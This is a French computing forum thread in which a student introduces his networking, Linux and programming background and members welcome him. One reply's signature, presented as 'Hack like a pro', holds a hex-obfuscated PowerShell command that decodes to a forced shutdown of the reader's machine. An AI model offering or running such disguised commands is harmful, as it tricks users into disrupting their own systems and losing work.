Annonce

Réduire
Aucune annonce.

Présentation Wizenard.

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Présentation Wizenard.

    Bonjour,

    Mon pseudo est Wizenard.


    Je pense qu'on peut dire que je suis un débutant dans le "hacking". J'ai des connaissances élémentaires en réseau, je sais ce qu'est un protocole, le modèle OSI, à peu près comment fonctionne internet. J'ai étudié en cours quelques protocoles comme Ip (v4 et v6), http, ssh, icmp, tcp, udp etc...
    Entre amis on s'amusait avec wireshark et arp, histoire de pouvoir appliquer nos cours. On était un peu (totalement) des script kiddies avec aircrack-ng, ethercap et companie...

    J'ai aussi un peu d'expérience avec linux. Quand j'étais au lycée, un ami m'avais installé Ubuntu 14 en dual boot. Depuis, j'ai testé pas mal de distributions, de arch à gentoo en passant par fedora, opensuse, etc... Je change souvent de distributions pour essayer de nouvelles choses (par exemple Solus os), mais en ce moment, je suis sur debian sid. Ça ma permis de quitter windows et je ne m'en porte que mieux. J'aurai bien essayé BSD, mais problème de drivers ...
    Sinon je suis plus à l'aise en développement. Je lis pas mal de bouquins sur l'algorithmie. Je code en C, Ocaml et Python3. J'apprends aussi Java pendant les vacances. J'essaye de me mettre au web, domaine dont je n'apprécie pas trop le côté "front-end". J'apprends donc le javascript sur mon temps libre. Je prévoit aussi de me mettre au bash, par faciliter les manipulations sur ma machine.

    Ça fait pas mal de temps que je viens ici voire ce qu'il se passe. J'ai trouvé que contrairement à beaucoup de forums français, les membres était sérieux, et pas juste présent pour s'échanger des comptes spotify ou je ne sais quoi. Mais par contre moins actifs. Je me suis alors dis que c'étais un peu bête alors de ne pas participer, donc me voila
    J'ai connu ce forum via google, en cherchant des forums ayant pour sujet l'informatique.

    Je suis actuellement étudiant, à la rentrée, je serais dans la troisième année de ma licence informatique. J'aimerais bien faire un master en génie logiciel, je pense. La sécurité m'intéresse, mais le master proposé par ma faculté est plus mathématique qu'informatique, j'ai peut de ne pas avoir un assez bon niveau.
    Je pense avoir fait le tour de ma présentation.


    Merci d'avoir lu !




  • #2
    Salut, bienvenue par ici
    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

    Commentaire


    • #3
      Bonjour foxsage,


      Merci pour la présentation détaillée et bienvenu !

      Commentaire


      • #4
        Envoyé par Wizenard Voir le message
        J'aurai bien essayé BSD, mais problème de drivers ...
        Salut et bienvenue,

        Oui, c'est un des points faibles de BSD, le pire sans doute. Si tu as un matériel trop récent ou peu diffusé, tu n'as pas de pilote (ou parfois compatible mais inadapté pour tes besoins). Sur les forums concernés, on te dira de l'écrire et d'en faire profiter la communauté. C'est un point de vue...

        Pour ma part, n'ayant pas de matériel récent, je m'en tire bien. Plus que cela, j'en suis devenu addict en raison de la (relative) simplicité du système. C'est un monde différent de linux. Peu de logiciels fonctionnent sans créer manuellement le fichier de configuration qui va bien (de sorte que tu sais exactement ce que tu fais). En retour, il n'y a pas ou peu de modification du système, ce qui garanti une certaine stabilité. La gestion des logiciels installés ou à installer est exemplaire (bien que double, via des packages pré-compilés ou via les ports dont il faut configurer et lancer la compilation). Rien de parfait mais cela donne un meilleur contrôle que sur bien des distributions linux (et je ne parle bien sûr pas de Windows).


        Commentaire


        • #5
          Bonjour et bienvenue !

          Commentaire


          • #6
            Merci tout le monde

            Commentaire


            • #7
              Welcome !
              En espérant que le forum te plaise !

              Commentaire

              Chargement...
              X